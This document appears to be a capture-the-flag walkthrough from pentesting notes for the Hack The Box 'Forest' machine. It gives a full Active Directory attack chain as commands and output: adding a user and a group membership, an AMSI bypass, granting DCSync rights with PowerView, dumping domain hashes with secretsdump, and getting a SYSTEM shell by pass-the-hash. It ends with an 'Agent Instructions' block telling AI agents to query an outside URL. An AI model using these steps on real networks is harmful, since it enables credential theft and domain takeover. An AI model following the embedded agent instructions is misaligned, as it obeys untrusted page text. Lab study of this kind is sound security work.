# DCSync Example Forest HTB
### Exploiting DCSync (from Forest(HTB))
From the above figure, we can see that *svc-alfresco* is a member of the group *Service Accounts* which is a member of the group *Privileged IT Accounts*, which is a member of *Account Operators*. which we can see by checking the "shortest path to domain admins" and then cheking the node properties.
Moreover, the *Account Operators* group has *GenericAll* permissions on the *Exchange Windows Permissions* group, which has *WriteDacl* permissions on the domain.
This was a mouthful, so let’s break it down.
* *svc-alfresco* is not just a member of *Service Accounts*, but is also a member of the groups *Privileged IT Accounts* and *Account Operators.*
* The Account Operators group [grants limited account creation privileges to a user](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators). Therefore, the user *svc-alfresco* can create other users on the domain.
* The *Account Operators* group has *GenericAll* permission on the *Exchange Windows Permissions* group. This permission essentially gives members full control of the group and therefore allows members to directly modify group membership. Since *svc-alfresco* is a member of *Account Operators*, he is able to modify the permissions of the *Exchange Windows Permissions* group.
* The *Exchange Windows Permission* group has *WriteDacl* permission on the domain *HTB.LOCAL*. This permission allows members to modify the DACL (Discretionary Access Control List) on the domain. We’ll abuse this to grant ourselves DcSync privileges, which will give us the right to perform domain replication and dump all the password hashes from the domain.
Putting all the pieces together, the following is our attack path.
1. Create a user on the domain. This is possible because *svc-alfresco* is a member of the group *Account Operators*.
2. Add the user to the *Exchange Windows Permission* group. This is possible because *svc-alfresco* has *GenericAll* permissions on the *Exchange Windows Permissions* group.
3. Give the user DcSync privileges. This is possible because the user is a part of the *Exchange Windows Permissions* group which has *WriteDacl* permission on the *htb.local* domain.
4. Perform a DcSync attack and dump the password hashes of all the users on the domain.
5. Perform a Pass the Hash attack to get access to the administrator’s account.
Now add a new user and add it to the exchange group
```
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user ammar ammar123 /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user ammar
User name ammar
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/30/2023 1:26:16 AM
Password expires Never
Password changeable 7/31/2023 1:26:16 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" /add ammar
The command completed successfully.
Alternate syntax
Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Members "ammar"
```
Now to check the aval modules you can use the command
```
menu
```
Now run the following commands before executing anything on target.
```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' (` '` (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> powershell -ep bypass
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-alfresco\Desktop>
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Bypass-4MSI
```
### Abusing write dacl
First, we need to create a credential object
```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $username ="htb\ammar"
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $password = ConvertTo-SecureString "ammar123" -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $credential = New-Object System.Management.Automation.PSCredential($username, $password)
```
Now, need PowerView, so locate it and upload it.
```
┌──(kali㉿kali)-[~/Desktop]
└─$ locate PowerView
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1
┌──(kali㉿kali)-[~/Desktop]
└─$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading /home/kali/Desktop/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
```
Now import PowerView
```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' (` '` (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-DomainGroupMember
[+] Add-DomainObjectAcl
[+] Add-RemoteConnection
[+] Add-Win32Type
[+] Convert-ADName
[+] Convert-DNSRecord
[+] ConvertFrom-LDAPLogonHours
[+] ConvertFrom-SID
[+] ConvertFrom-UACValue
[+] Convert-LDAPProperty
```
Now execute one of the following to grant dcsync rights.
```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $credential -PrincipalIdentity 'htb\ammar' -TargetIdentity 'htb.local\Domain Admins' -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-ObjectAcl -PrincipalIdentity 'htb\ammar' -Credential $credential -Rights DCSync
```
You can also use the following syntax
```
Add-DomainObjectAcl -Credential $credial -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity ammar -Rights DCSync
```
### Dumping hashes
Now, we can use impacket to dump all hashes.
```
┌──(kali㉿kali)-[~/Desktop/new]
└─$ impacket-secretsdump htb.local/ammar:ammar123@10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
```
### Pass the Hash
Now, we can simply pass the hash to get shell.
```
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file zcJDWnNu.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service GPAd on 10.10.10.161.....
[*] Starting service GPAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
```
#### Pass the hash with evil-winrm
You can also use evil-winrm. Remember to use only NT hash(last part).
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://notes.cavementech.com/pentesting-quick-reference/active-directory/access-control-list-acl-abuse-primer/dcsync/dcsync-example-forest-htb.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
